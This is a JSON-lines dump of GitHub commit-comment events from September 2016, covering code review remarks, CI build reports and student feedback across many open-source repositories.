{"id":"4571304000","type":"CommitCommentEvent","actor":{"login":"Rocky640"},"repo":{"name":"Rocky640/Stockfish"},"payload":{"comment":{"id":19046132,"position":null,"line":null,"path":null,"commit_id":"096e900d64b6f5f2b7d1dfa7dccb80ff74a80a91","created_at":"2016-09-15T23:09:10Z","updated_at":"2016-09-15T23:09:10Z","body":"a) Before the recent changes, SEE was not taking pins into consideration. \r\n\r\nb) Recent work by pb consider them until some \"pinners\" are removed in the SEE calculation.\r\n Patches trying to define more exactly the \"pinners\" are struggling.\r\n\r\nc) So how about to always exclude the pinned pieces from the SEE calculation ?\r\n"}},"created_at":"2016-09-15T23:09:10Z"}
{"id":"4571305898","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19046140,"position":null,"line":null,"path":null,"commit_id":"1baf20928e190562630492000c923a3ac0217c9d","created_at":"2016-09-15T23:09:43Z","updated_at":"2016-09-15T23:09:43Z","body":"FixAgainCentroidForNonConvex (mjwitte) - x86_64-Linux-Ubuntu-14.04-custom_check: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-1baf20928e190562630492000c923a3ac0217c9d-x86_64-Linux-Ubuntu-14.04-custom_check.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a>  \n"}},"created_at":"2016-09-15T23:09:43Z"}
{"id":"4571307292","type":"CommitCommentEvent","actor":{"login":"todiadiyatmo"},"repo":{"name":"todiadiyatmo/fix-w3tc"},"payload":{"comment":{"id":19046143,"position":null,"line":null,"path":null,"commit_id":"80b2f3d919412052055c1dbf6824d390448b5f2d","created_at":"2016-09-15T23:10:08Z","updated_at":"2016-09-15T23:10:08Z","body":"seems because i use atom editor :( "}},"created_at":"2016-09-15T23:10:08Z"}
{"id":"4571324473","type":"CommitCommentEvent","actor":{"login":"timb320"},"repo":{"name":"timb320/hello-world"},"payload":{"comment":{"id":19046184,"position":null,"line":null,"path":null,"commit_id":"ecb1d80cf77b6e0ae5811c38bd51587ab4c45147","created_at":"2016-09-15T23:15:12Z","updated_at":"2016-09-15T23:15:12Z","body":"![100_0914](https://cloud.githubusercontent.com/assets/22184790/18570514/861317dc-7b5f-11e6-8864-28388c37d9fb.JPG)\r\n"}},"created_at":"2016-09-15T23:15:12Z"}
{"id":"4571329066","type":"CommitCommentEvent","actor":{"login":"psylone"},"repo":{"name":"balashovmb/edispatcher"},"payload":{"comment":{"id":19046202,"position":14,"line":22,"path":"db/schema.rb","commit_id":"5d4f181559e2bea4fdbbb2d7866627b368987312","created_at":"2016-09-15T23:16:31Z","updated_at":"2016-09-15T23:16:31Z","body":"Хорошо бы здесь ввести ограничения целостности `null: false`."}},"created_at":"2016-09-15T23:16:31Z"}
{"id":"4571329760","type":"CommitCommentEvent","actor":{"login":"EricDavies"},"repo":{"name":"priologic/easyrtc"},"payload":{"comment":{"id":19046204,"position":27,"line":484,"path":"api/easyrtc_int.js","commit_id":"7f07d6975a32d3fbd193b9e4c1b9e0ddec11274a","created_at":"2016-09-15T23:16:45Z","updated_at":"2016-09-15T23:16:45Z","body":"You are quite correct! It was inherited from the code I copied from, ie, copy/paste error. I've now removed it. Good eye catching it."}},"created_at":"2016-09-15T23:16:45Z"}
{"id":"4571330490","type":"CommitCommentEvent","actor":{"login":"timb320"},"repo":{"name":"timb320/hello-world"},"payload":{"comment":{"id":19046207,"position":null,"line":null,"path":null,"commit_id":"ecb1d80cf77b6e0ae5811c38bd51587ab4c45147","created_at":"2016-09-15T23:16:58Z","updated_at":"2016-09-15T23:16:58Z","body":"ibanez rg serries"}},"created_at":"2016-09-15T23:16:58Z"}
{"id":"4571334064","type":"CommitCommentEvent","actor":{"login":"Dieggore"},"repo":{"name":"Dieggore/pomodoroApp"},"payload":{"comment":{"id":19046216,"position":null,"line":null,"path":null,"commit_id":"3f19036e5c007c6a17cc7a04d55cebe1a609cbc9","created_at":"2016-09-15T23:17:58Z","updated_at":"2016-09-15T23:17:58Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;V5J7jJ9w&#x2F;2-set-timer-function-to-actually-manipulate-the-knob\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> set timer function to actually manipulate the knob</a>"}},"created_at":"2016-09-15T23:17:58Z"}
{"id":"4571336783","type":"CommitCommentEvent","actor":{"login":"andyjansson"},"repo":{"name":"crazile/postcss-functions"},"payload":{"comment":{"id":19046225,"position":10,"line":13,"path":"index.js","commit_id":"5d876cc997b67e0346fd11e7045031182cbc27b6","created_at":"2016-09-15T23:18:44Z","updated_at":"2016-09-15T23:18:44Z","body":"Fair enough. "}},"created_at":"2016-09-15T23:18:44Z"}
{"id":"4571336920","type":"CommitCommentEvent","actor":{"login":"Salvi6God"},"repo":{"name":"egonSchiele/grokking_algorithms"},"payload":{"comment":{"id":19046227,"position":1,"line":1,"path":"04_quicksort/ruby/05_quicksort.rb","commit_id":"33d432bdaf421d78af2bb688ad7bb62219e6c5ad","created_at":"2016-09-15T23:18:46Z","updated_at":"2016-09-15T23:18:46Z","body":"On page 69 in the book 'Grokking Algorithms', it states that by picking the first element of an array as a pivot every time it creates a call stack that is really long. We never try to cut the array in half in order to have a shorter call stack. So it made me assume that we were always implementing the worst-case scenario rather than the average/best-case scenario that is described in the book.\r\n\r\nEither way, we are implementing quicksort at the end of the day but I would really love your response on this because this is so cool to learn. :) "}},"created_at":"2016-09-15T23:18:46Z"}
{"id":"4571338004","type":"CommitCommentEvent","actor":{"login":"zenspider"},"repo":{"name":"zenspider/graphics"},"payload":{"comment":{"id":19046233,"position":22,"line":72,"path":"Manifest.txt","commit_id":"30dceff29e42a5ad07771651e6a4c2ef64e8e2d1","created_at":"2016-09-15T23:19:03Z","updated_at":"2016-09-15T23:19:03Z","body":"this is bad. fixing..."}},"created_at":"2016-09-15T23:19:03Z"}
{"id":"4571339534","type":"CommitCommentEvent","actor":{"login":"sricharan123"},"repo":{"name":"navsreks/DLN-Validation"},"payload":{"comment":{"id":19046238,"position":null,"line":null,"path":null,"commit_id":"b6a5a37b49d328b8842f6a393cc2437b5cb9272d","created_at":"2016-09-15T23:19:29Z","updated_at":"2016-09-15T23:19:29Z","body":"'_stateChanged(userProfile.state)' method name should change, as we are observing for state AND we need to observe for dirverlicense paper-input..ALSO..so..\r\n\r\n'_stateChanged(userProfile.state, _DLN)'      (change in method and in observer also..)\r\nit will work.. if pattern wonk expose to outside element put _pattern.\r\n"}},"created_at":"2016-09-15T23:19:29Z"}
{"id":"4571340039","type":"CommitCommentEvent","actor":{"login":"RoboMWM"},"repo":{"name":"MCShovel/GriefPrevention"},"payload":{"comment":{"id":19046239,"position":26,"line":448,"path":"src/me/ryanhamshire/GriefPrevention/BlockEventHandler.java","commit_id":"800f0d76d8b786bb1491c139885a71aaf82a8ac1","created_at":"2016-09-15T23:19:39Z","updated_at":"2016-09-15T23:19:39Z","body":"Ah, gotcha then, will do :P"}},"created_at":"2016-09-15T23:19:39Z"}
{"id":"4571340662","type":"CommitCommentEvent","actor":{"login":"psylone"},"repo":{"name":"balashovmb/edispatcher"},"payload":{"comment":{"id":19046242,"position":17,"line":36,"path":"db/schema.rb","commit_id":"642865fe6feb8b3e50ca0496141e63be4125543d","created_at":"2016-09-15T23:19:50Z","updated_at":"2016-09-15T23:19:50Z","body":"Здесь тоже ограничения целостности `null: false` не помешают."}},"created_at":"2016-09-15T23:19:50Z"}
{"id":"4571341487","type":"CommitCommentEvent","actor":{"login":"mathias-hiron"},"repo":{"name":"France-ioi/bebras-modules"},"payload":{"comment":{"id":19046244,"position":null,"line":null,"path":null,"commit_id":"8dc7e2251e1e5289ed8e4565f8e3dc39a3c9274c","created_at":"2016-09-15T23:20:03Z","updated_at":"2016-09-15T23:20:03Z","body":"Hi,\n\nYes I think so, thanks!\n\nMathias\n\nOn Fri, Sep 16, 2016 at 1:03 AM, Nir Lavee <notifications@github.com> wrote:\n\n> Hi,\n>\n> Destroying the temporary instance seems simpler. Please take a look at\n> 1aafe38\n> <https://github.com/France-ioi/bebras-modules/commit/1aafe382323d1f870cce04a277a6893596a19e45>\n> and let me know if it's the desired behavior.\n>\n> Thanks\n> Nir\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/France-ioi/bebras-modules/commit/8dc7e2251e1e5289ed8e4565f8e3dc39a3c9274c#commitcomment-19046075>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AImiDe9w11_aouk4uyh4yauh6hp7tXr4ks5qqc7HgaJpZM4J9wcV>\n> .\n>\n"}},"created_at":"2016-09-15T23:20:03Z"}
{"id":"4571342395","type":"CommitCommentEvent","actor":{"login":"jrose-apple"},"repo":{"name":"apple/swift"},"payload":{"comment":{"id":19046246,"position":null,"line":null,"path":null,"commit_id":"34fb15e3754df8d8e6f0d8cfcfda81ae5f86e324","created_at":"2016-09-15T23:20:17Z","updated_at":"2016-09-15T23:20:17Z","body":"I'm 0 for 2 (or 3). I was thinking it would affect the mangling, but of course we mangle based on the AST."}},"created_at":"2016-09-15T23:20:17Z"}
{"id":"4571344279","type":"CommitCommentEvent","actor":{"login":"crazile"},"repo":{"name":"crazile/postcss-functions"},"payload":{"comment":{"id":19046252,"position":10,"line":13,"path":"index.js","commit_id":"5d876cc997b67e0346fd11e7045031182cbc27b6","created_at":"2016-09-15T23:20:51Z","updated_at":"2016-09-15T23:20:51Z","body":"Would you like me to create a pull request?"}},"created_at":"2016-09-15T23:20:51Z"}
{"id":"4571346671","type":"CommitCommentEvent","actor":{"login":"poitras"},"repo":{"name":"poitras/web-portfolio"},"payload":{"comment":{"id":19046259,"position":null,"line":null,"path":null,"commit_id":"25d39ab5d4a84b78c0f3a33271f2775e06bb7301","created_at":"2016-09-15T23:21:27Z","updated_at":"2016-09-15T23:21:27Z","body":"ajout du site web a google analytic aussi"}},"created_at":"2016-09-15T23:21:27Z"}
{"id":"4571346917","type":"CommitCommentEvent","actor":{"login":"chris3torek"},"repo":{"name":"freenas/freenas"},"payload":{"comment":{"id":19046263,"position":13,"line":60,"path":"src/freenas/usr/local/bin/freenas-snmp/zfs-snmp","commit_id":"cfe7240ba0d1751b99312a3a47aeb6ed984b8a31","created_at":"2016-09-15T23:21:31Z","updated_at":"2016-09-15T23:21:31Z","body":"One last change needed for py3k only, this also must be `b''` (otherwise the loop runs forever, a quick test says `b'' != ''`)."}},"created_at":"2016-09-15T23:21:31Z"}
{"id":"4571347653","type":"CommitCommentEvent","actor":{"login":"KCherkasov"},"repo":{"name":"KCherkasov/test_tools"},"payload":{"comment":{"id":19046266,"position":null,"line":null,"path":null,"commit_id":"be96cc04d30a7a2d4a5a144ae364cfa50be574bc","created_at":"2016-09-15T23:21:44Z","updated_at":"2016-09-15T23:21:44Z","body":"-added some verbosity to Tester::test() method."}},"created_at":"2016-09-15T23:21:44Z"}
{"id":"4571349346","type":"CommitCommentEvent","actor":{"login":"hkozachkov"},"repo":{"name":"opencv/opencv"},"payload":{"comment":{"id":19046269,"position":null,"line":null,"path":null,"commit_id":"c5d7791b67cb2810bff9a3123f9f640e5dcc7530","created_at":"2016-09-15T23:22:13Z","updated_at":"2016-09-15T23:22:13Z","body":"This commit breaks the build on aarch64 with cuda enabled: cvdef.h is included in files that are passed to NVCC, which doesn't know about __fp16"}},"created_at":"2016-09-15T23:22:13Z"}
{"id":"4571352703","type":"CommitCommentEvent","actor":{"login":"carilevay"},"repo":{"name":"gitrock/sfdat26-capar"},"payload":{"comment":{"id":19046277,"position":null,"line":null,"path":null,"commit_id":"6ee96f93aafa4c07acce7672b36cbb8d09d17cfb","created_at":"2016-09-15T23:23:06Z","updated_at":"2016-09-15T23:23:06Z","body":"Businesses:\r\n\r\n- # 4 - Clever way to find the month values. Alternatively, you can convert the ‘date’ column to a datetime object and extract the month.\r\n - inspections['month'] = inspections['date'].apply(lambda x: pd.to_datetime(str(x), format='%Y%m%d')).apply(lambda x: x.month)\r\n\r\n- Great job on the heatmap\r\n\r\n- # 6 - You can use this to find distribution of risk categories for new ownership: restaurant_scores[restaurant_scores.type == 'New Ownership'].risk_category.value_counts(normalize=True)\r\n\r\nMorbid\r\n\r\n- #11 - You can make your histograms more readable by adding figsize = (12,8)\r\n\r\nLess Morbid\r\n\r\n- #3 - This is great. sort_values can take a second parameter called ascending=False\r\n - Ex: majors[['Major','Median']].sort_values(by='Median',ascending=False).head(10)\r\n\r\n- # 8 - Again, you can make your figure size bigger by adding the parameter: figsize = (10,10)\r\n"}},"created_at":"2016-09-15T23:23:06Z"}
{"id":"4571353572","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19046281,"position":null,"line":null,"path":null,"commit_id":"e3d19a4cbe7168593a0462ea0d81ecf6e10ec8ff","created_at":"2016-09-15T23:23:18Z","updated_at":"2016-09-15T23:23:18Z","body":"ASIHPValidation (shenb) - i386-Windows-7-VisualStudio-12: OK (2333 of 2334 tests passed, 21 test warnings)\n\n * 22 tests had: EIO diffs.\n * 21 tests had: ERR diffs.\n * 1 test had: ESO big diffs.\n * 1 test had: MTR big diffs.\n * 1 test had: Table big diffs.\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-e3d19a4cbe7168593a0462ea0d81ecf6e10ec8ff-i386-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-e3d19a4cbe7168593a0462ea0d81ecf6e10ec8ff-i386-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.96%25-yellow.svg)</a> \n"}},"created_at":"2016-09-15T23:23:18Z"}
{"id":"4571357657","type":"CommitCommentEvent","actor":{"login":"ketzacoatl"},"repo":{"name":"fpco/fpco-salt-formula"},"payload":{"comment":{"id":19046291,"position":20,"line":14,"path":"stack/docker_cleanup.sls","commit_id":"76d05cea532ebbd5173bc8777cd304cc9d85a7a9","created_at":"2016-09-15T23:24:24Z","updated_at":"2016-09-15T23:24:24Z","body":"why are you changing this default? The commit message says nothing about updating stopped_containers, nor the ticket this is associated with."}},"created_at":"2016-09-15T23:24:24Z"}
{"id":"4571359180","type":"CommitCommentEvent","actor":{"login":"truongtuanson"},"repo":{"name":"111994/solid-winner"},"payload":{"comment":{"id":19046294,"position":null,"line":null,"path":null,"commit_id":"b24f73092c725e1702759979f7da27c5c74f8bfa","created_at":"2016-09-15T23:24:51Z","updated_at":"2016-09-15T23:24:51Z","body":"[System_Center_2012_R2_Evaluation_Guide.pdf](https://github.com/111994/solid-winner/files/475795/System_Center_2012_R2_Evaluation_Guide.pdf)\r\n"}},"created_at":"2016-09-15T23:24:51Z"}
{"id":"4571362830","type":"CommitCommentEvent","actor":{"login":"WikiaJenkins"},"repo":{"name":"Wikia/design-system"},"payload":{"comment":{"id":19046302,"position":null,"line":null,"path":null,"commit_id":"13caf045857fbc55545192056aeed3fc275fef3e","created_at":"2016-09-15T23:25:54Z","updated_at":"2016-09-15T23:25:54Z","body":"Visual Regression Testing found a difference between new version and the baseline.\nCheck the diffs [here](http://jenkins.wikia-prod:8080/job/design-system-reference-page-pr-check/480/).\nAccept the new baseline [here](http://jenkins.wikia-prod:8080/job/design-system-reference-page-update-baseline/parambuild?branch=XW-2018)."}},"created_at":"2016-09-15T23:25:54Z"}
{"id":"4571369381","type":"CommitCommentEvent","actor":{"login":"eddibravo"},"repo":{"name":"ostapqwert/genmvc"},"payload":{"comment":{"id":19046320,"position":2,"line":2,"path":".gitignore","commit_id":"db736a401eafb1d2eabfac9b5760abeb04a7ae8d","created_at":"2016-09-15T23:27:42Z","updated_at":"2016-09-15T23:27:42Z","body":"`tmp/logs/*` - вот так правильнее, иначе ты в gitignore ложишь и папку logs, а нам нужно чтоб эта папка присутствовала"}},"created_at":"2016-09-15T23:27:42Z"}
{"id":"4571371759","type":"CommitCommentEvent","actor":{"login":"Paebbels"},"repo":{"name":"VHDL/CoreLib"},"payload":{"comment":{"id":19046325,"position":null,"line":null,"path":null,"commit_id":"bc9adb048fbf9ecca17cb01d0a34188d3893d58a","created_at":"2016-09-15T23:28:17Z","updated_at":"2016-09-15T23:28:17Z","body":"The `vim` line is interpreted by other editors too. E.g. vi.\r\nThere was a discussion for GitHub to support the vi/vim line, but that feature was never implemented ..."}},"created_at":"2016-09-15T23:28:17Z"}
{"id":"4571376221","type":"CommitCommentEvent","actor":{"login":"WikiaJenkins"},"repo":{"name":"Wikia/design-system"},"payload":{"comment":{"id":19046334,"position":null,"line":null,"path":null,"commit_id":"de6e812f705391a826bb823d112b9c5bc532f5d7","created_at":"2016-09-15T23:29:32Z","updated_at":"2016-09-15T23:29:32Z","body":"Visual Regression Testing found a difference between new version and the baseline.\nCheck the diffs [here](http://jenkins.wikia-prod:8080/job/design-system-reference-page-pr-check/481/).\nAccept the new baseline [here](http://jenkins.wikia-prod:8080/job/design-system-reference-page-update-baseline/parambuild?branch=XW-2018)."}},"created_at":"2016-09-15T23:29:32Z"}
{"id":"4571382231","type":"CommitCommentEvent","actor":{"login":"LucDemortier"},"repo":{"name":"n-bangs/dsp"},"payload":{"comment":{"id":19046345,"position":null,"line":null,"path":null,"commit_id":"b7f5b0ecd141166f6f5f4efd5445bccaee7e3689","created_at":"2016-09-15T23:31:13Z","updated_at":"2016-09-15T23:31:13Z","body":"RE: 05a-python.md\r\ncc: @lucdemortier @reshamametis @aramnath @gfsoileau @julialintern @galvin-mj\r\n\r\nHello @n-bangs \r\nExcellent work! Nicely concise implementation of front_back in q6_strings. 👍 "}},"created_at":"2016-09-15T23:31:13Z"}
{"id":"4571386084","type":"CommitCommentEvent","actor":{"login":"andyjansson"},"repo":{"name":"crazile/postcss-functions"},"payload":{"comment":{"id":19046351,"position":10,"line":13,"path":"index.js","commit_id":"5d876cc997b67e0346fd11e7045031182cbc27b6","created_at":"2016-09-15T23:32:19Z","updated_at":"2016-09-15T23:32:19Z","body":"A pull request would be super. If you don't mind me asking, how much of a difference does this change do to your build time?\r\n\r\nOh, and also, if at all possible, could you write a unit test validating the behaviour so that we may prevent future regression? I understand that it might be a difficult thing to add considering that this change addresses performance rather than functional behaviour, but if it can be accomplished, it'd be a great thing to have. \r\n\r\nThanks. "}},"created_at":"2016-09-15T23:32:19Z"}
{"id":"4571388858","type":"CommitCommentEvent","actor":{"login":"mdusman1982"},"repo":{"name":"mdusman1982/website"},"payload":{"comment":{"id":19046357,"position":1,"line":9,"path":"README.md","commit_id":"67a4bb8a19fa1d284c17f17cf959f4f6bb76948e","created_at":"2016-09-15T23:33:08Z","updated_at":"2016-09-15T23:33:08Z","body":"## Comment in file "}},"created_at":"2016-09-15T23:33:08Z"}
{"id":"4571389380","type":"CommitCommentEvent","actor":{"login":"mdusman1982"},"repo":{"name":"mdusman1982/website"},"payload":{"comment":{"id":19046358,"position":null,"line":null,"path":null,"commit_id":"67a4bb8a19fa1d284c17f17cf959f4f6bb76948e","created_at":"2016-09-15T23:33:16Z","updated_at":"2016-09-15T23:33:16Z","body":"## Comment in general "}},"created_at":"2016-09-15T23:33:16Z"}
{"id":"4571394296","type":"CommitCommentEvent","actor":{"login":"vinceblk"},"repo":{"name":"joshuajbouw/joshuajbouw.github.io"},"payload":{"comment":{"id":19046366,"position":null,"line":null,"path":null,"commit_id":"be985257586958376ce4ec071b590c9fc327ad2b","created_at":"2016-09-15T23:34:38Z","updated_at":"2016-09-15T23:34:38Z","body":"'Sla' commit name = Slack popup"}},"created_at":"2016-09-15T23:34:38Z"}
{"id":"4571397582","type":"CommitCommentEvent","actor":{"login":"PeratX"},"repo":{"name":"iTXTech/Genisys"},"payload":{"comment":{"id":19046373,"position":17,"line":1002,"path":"src/pocketmine/Player.php","commit_id":"5e4bfc0a0218e6529e47a50914c203f40b04493d","created_at":"2016-09-15T23:35:37Z","updated_at":"2016-09-15T23:35:37Z","body":"+1"}},"created_at":"2016-09-15T23:35:37Z"}
{"id":"4571401914","type":"CommitCommentEvent","actor":{"login":"tenderlove"},"repo":{"name":"ruby/ruby"},"payload":{"comment":{"id":19046391,"position":null,"line":null,"path":null,"commit_id":"cfb2b14ddce37c3a1c388748e6aaa897ce99923e","created_at":"2016-09-15T23:36:54Z","updated_at":"2016-09-15T23:36:54Z","body":"@nobu are you sure we should do this?  I'm processing some *very large* heaps, and this means that I have to read the entire JSON file in to memory before I can do processing.  Before this change I could do:\r\n\r\n```ruby\r\nFile.open(json, 'r') do |f|\r\n  f.each_line do |object|\r\n    object = JSON.parse object\r\n    # do something with the object\r\n  end\r\nend\r\n```\r\n\r\nNow I have to read the entire heap dump in to memory before I can do any processing.  Could we either revert this, or add an option to dump the heap in the old format?"}},"created_at":"2016-09-15T23:36:54Z"}
{"id":"4571402294","type":"CommitCommentEvent","actor":{"login":"hthetiot"},"repo":{"name":"priologic/easyrtc"},"payload":{"comment":{"id":19046393,"position":27,"line":484,"path":"api/easyrtc_int.js","commit_id":"7f07d6975a32d3fbd193b9e4c1b9e0ddec11274a","created_at":"2016-09-15T23:37:02Z","updated_at":"2016-09-15T23:37:02Z","body":"Grunt jslint should be available in case you need on beta. \r\n"}},"created_at":"2016-09-15T23:37:02Z"}
{"id":"4571402446","type":"CommitCommentEvent","actor":{"login":"emartinrda"},"repo":{"name":"IDEEGroup/uca2016"},"payload":{"comment":{"id":19046394,"position":1,"line":1,"path":"hola.txt","commit_id":"668697bf1c5a729057ffe2ae055b53814759af4e","created_at":"2016-09-15T23:37:05Z","updated_at":"2016-09-15T23:37:05Z","body":"no me gusta lo que hiciste"}},"created_at":"2016-09-15T23:37:05Z"}
{"id":"4571402854","type":"CommitCommentEvent","actor":{"login":"hthetiot"},"repo":{"name":"priologic/easyrtc"},"payload":{"comment":{"id":19046395,"position":null,"line":null,"path":null,"commit_id":"09ea92fc96a2ca6e0344e82fb45d0fb8a0afba17","created_at":"2016-09-15T23:37:12Z","updated_at":"2016-09-15T23:37:12Z","body":"Lgtm"}},"created_at":"2016-09-15T23:37:12Z"}
{"id":"4571406933","type":"CommitCommentEvent","actor":{"login":"psycofdj"},"repo":{"name":"psycofdj/xtdcpp"},"payload":{"comment":{"id":19046405,"position":null,"line":null,"path":null,"commit_id":"18a46404cad4069c81abc830d8ed60036edde5d4","created_at":"2016-09-15T23:38:25Z","updated_at":"2016-09-15T23:38:25Z","body":"Build report #160319753 for sha 18a46404cad4069c81abc830d8ed60036edde5d4:\n\n[![UnitTests](https://img.shields.io/badge/unittests-passed%20%280/0%29%20-brightgreen.svg)](#)\n[![Coverage](https://img.shields.io/badge/coverage-0.00%20%25-yellow.svg)](#)\n[![Cppcheck](https://img.shields.io/badge/cppcheck-2%20error%28s%29-yellow.svg)](#)\n[![Code statistics](https://img.shields.io/badge/cloc-1811%20/%208785%20%2820.61%20%25%29-yellow.svg)](#)\n[![Documentation](https://img.shields.io/badge/doc-success-brightgreen.svg)](#)\n[![Documentation coverage](https://img.shields.io/badge/doc--coverage-0.00%20%25-yellow.svg)](#)\n"}},"created_at":"2016-09-15T23:38:25Z"}
{"id":"4571407917","type":"CommitCommentEvent","actor":{"login":"ari"},"repo":{"name":"ari/jobsworth"},"payload":{"comment":{"id":19046406,"position":null,"line":null,"path":null,"commit_id":"3c9a2ae0f7f4f2c394dd31a74366ab70ddf34749","created_at":"2016-09-15T23:38:44Z","updated_at":"2016-09-15T23:38:44Z","body":"This isn't yet enough. We can still trivially crash the system by choosing a filter to show all open tasks in the system (about 1200 tasks).\r\n\r\nWe might need to add a LIMIT to the query of say 500, or page the results, or remove more of the eager loading."}},"created_at":"2016-09-15T23:38:44Z"}
{"id":"4571409003","type":"CommitCommentEvent","actor":{"login":"LucDemortier"},"repo":{"name":"n-bangs/dsp"},"payload":{"comment":{"id":19046410,"position":null,"line":null,"path":null,"commit_id":"2fbc661ee0a1fd1c3acd40c54d3a0015525da551","created_at":"2016-09-15T23:39:04Z","updated_at":"2016-09-15T23:39:04Z","body":"RE: 05b-python_advanced.md\r\ncc: @lucdemortier @reshamametis @aramnath @gfsoileau @julialintern @galvin-mj\r\n\r\nHello @n-bangs \r\nGood work here too! \r\n👍 "}},"created_at":"2016-09-15T23:39:04Z"}
{"id":"4571409694","type":"CommitCommentEvent","actor":{"login":"timb320"},"repo":{"name":"timb320/hello-world"},"payload":{"comment":{"id":19046412,"position":2,"line":2,"path":"README.md","commit_id":"ecb1d80cf77b6e0ae5811c38bd51587ab4c45147","created_at":"2016-09-15T23:39:16Z","updated_at":"2016-09-15T23:39:16Z","body":"write"}},"created_at":"2016-09-15T23:39:16Z"}
{"id":"4571409957","type":"CommitCommentEvent","actor":{"login":"mcanan"},"repo":{"name":"mcanan/min-php-framework"},"payload":{"comment":{"id":19046415,"position":null,"line":null,"path":null,"commit_id":"a005edd37a17f3f7e7b8c83ffd431dcc169dabf6","created_at":"2016-09-15T23:39:21Z","updated_at":"2016-09-15T23:39:21Z","body":"Close issue #1 "}},"created_at":"2016-09-15T23:39:21Z"}
{"id":"4571410187","type":"CommitCommentEvent","actor":{"login":"aexmachina"},"repo":{"name":"aexmachina/ember-notify"},"payload":{"comment":{"id":19046417,"position":null,"line":null,"path":null,"commit_id":"d5a81aeec3fdf1bc649f097555f36e996bb10458","created_at":"2016-09-15T23:39:25Z","updated_at":"2016-09-15T23:39:25Z","body":"I'm not using 2.8. The test suite for ember-notify does test against 2.8\nthough.​\n"}},"created_at":"2016-09-15T23:39:25Z"}
{"id":"4571411484","type":"CommitCommentEvent","actor":{"login":"erica"},"repo":{"name":"apple/swift"},"payload":{"comment":{"id":19046420,"position":null,"line":null,"path":null,"commit_id":"c20f3db09e41ca0dcaae885a6c10164a8074612e","created_at":"2016-09-15T23:39:49Z","updated_at":"2016-09-15T23:39:49Z","body":"So....is it there now?"}},"created_at":"2016-09-15T23:39:49Z"}
{"id":"4571416112","type":"CommitCommentEvent","actor":{"login":"joaander"},"repo":{"name":"joaander/upp11"},"payload":{"comment":{"id":19046432,"position":null,"line":null,"path":null,"commit_id":"8be99527a1e393ec2721831032bce5c23a0c6873","created_at":"2016-09-15T23:41:13Z","updated_at":"2016-09-15T23:41:13Z","body":"Yes, it is nice and simple, and requires a minimal amount of code to implement and use. I used it to replace boost::unit_test in a large project."}},"created_at":"2016-09-15T23:41:13Z"}
{"id":"4571418224","type":"CommitCommentEvent","actor":{"login":"hthetiot"},"repo":{"name":"priologic/easyrtc"},"payload":{"comment":{"id":19046437,"position":null,"line":null,"path":null,"commit_id":"1abeb80729ac243fe2e19b4c709fca3c95b6f0fd","created_at":"2016-09-15T23:41:53Z","updated_at":"2016-09-15T23:41:53Z","body":"@ericdavies I think the change in easyrtc.js you made here will be override by next build cause it not in easyrtc_int.js the chance as being made."}},"created_at":"2016-09-15T23:41:53Z"}
{"id":"4571421492","type":"CommitCommentEvent","actor":{"login":"hthetiot"},"repo":{"name":"priologic/easyrtc"},"payload":{"comment":{"id":19046456,"position":null,"line":null,"path":null,"commit_id":"1abeb80729ac243fe2e19b4c709fca3c95b6f0fd","created_at":"2016-09-15T23:42:54Z","updated_at":"2016-09-15T23:42:54Z","body":"Or may be you simply rebuilded with last adapter then we need to update in bower or somewhere what version we use."}},"created_at":"2016-09-15T23:42:54Z"}
{"id":"4571426572","type":"CommitCommentEvent","actor":{"login":"johnmee"},"repo":{"name":"marionettejs/backbone.marionette"},"payload":{"comment":{"id":19046467,"position":39,"line":77,"path":"docs/marionette.object.md","commit_id":"f781dd96824569342782021c42fcfd39e06ae3c4","created_at":"2016-09-15T23:44:26Z","updated_at":"2016-09-15T23:44:26Z","body":"Removing `doFoo` and `executeFoo` breaks the references to them in the next paragraph."}},"created_at":"2016-09-15T23:44:26Z"}
{"id":"4571427548","type":"CommitCommentEvent","actor":{"login":"rossy"},"repo":{"name":"mpv-player/mpv"},"payload":{"comment":{"id":19046470,"position":null,"line":null,"path":null,"commit_id":"98f1b5fb9859a7f19d71137a3feae5f0c6031e78","created_at":"2016-09-15T23:44:44Z","updated_at":"2016-09-15T23:44:44Z","body":"Heh.\r\n\r\nI hope mp_uninit_ipc actually works."}},"created_at":"2016-09-15T23:44:44Z"}
{"id":"4571432312","type":"CommitCommentEvent","actor":{"login":"LucDemortier"},"repo":{"name":"n-bangs/dsp"},"payload":{"comment":{"id":19046483,"position":null,"line":null,"path":null,"commit_id":"e78292542805b76f4cbc6a5f204b21151bf27d6e","created_at":"2016-09-15T23:46:08Z","updated_at":"2016-09-15T23:46:08Z","body":"RE: 06-linear_algebra.md\r\ncc: @lucdemortier @reshamametis @aramnath @gfsoileau @julialintern @galvin-mj\r\n\r\nHello @n-bangs \r\n\r\nThis is very good, but note that you can also use numpy for operations on matrices, for example np.dot(A,B) for multiplying A and B.\r\n\r\n👍 "}},"created_at":"2016-09-15T23:46:08Z"}
{"id":"4571434532","type":"CommitCommentEvent","actor":{"login":"benmwebb"},"repo":{"name":"salilab/pmi"},"payload":{"comment":{"id":19046493,"position":16,"line":487,"path":"pyext/src/macros.py","commit_id":"ef59784e6303d43c0e70906bffc3480129e75825","created_at":"2016-09-15T23:46:46Z","updated_at":"2016-09-15T23:46:46Z","body":"`if keep_chain_id:` is cleaner code here."}},"created_at":"2016-09-15T23:46:46Z"}
